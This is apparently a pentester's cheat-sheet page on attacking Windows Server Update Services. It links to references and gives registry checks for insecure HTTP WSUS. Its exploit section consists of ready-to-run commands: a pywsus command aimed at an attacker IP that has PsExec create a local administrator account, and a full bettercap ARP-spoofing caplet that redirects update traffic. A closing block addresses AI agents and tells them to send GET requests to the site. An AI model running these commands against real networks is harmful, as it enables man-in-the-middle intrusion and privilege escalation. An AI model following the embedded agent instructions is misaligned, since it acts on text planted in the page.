# WSUS

* <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus>

## HTTP MitM

* <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf>
* <https://github.com/GoSecure/pywsus>
* <https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/>
* <https://www.thehacker.recipes/systems-and-services/privilege-escalation/windows/wsus-attacks>
* <https://github.com/NeffIsBack/wsuks>

Check:

```
PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
      WUServer    REG_SZ    http://wsus.megacorp.local:8530

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
      UseWUServer    REG_DWORD    0x1
```

Exploit:

```
$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap
```

{% code title="wsus.cap" %}

```bash
# Quick recon of the network
net.probe on

# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
any.proxy on
arp.spoof on
net.sniff on
```

{% endcode %}

## Local Proxy (LPE)

* <https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>

## WSUS + LDAPS NTLM Relay

* <https://www.gosecure.net/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks/>

## Tools

### SharpWSUS

* <https://labs.nettitude.com/blog/introducing-sharpwsus/>
* <https://github.com/nettitude/SharpWSUS>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/wsus.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.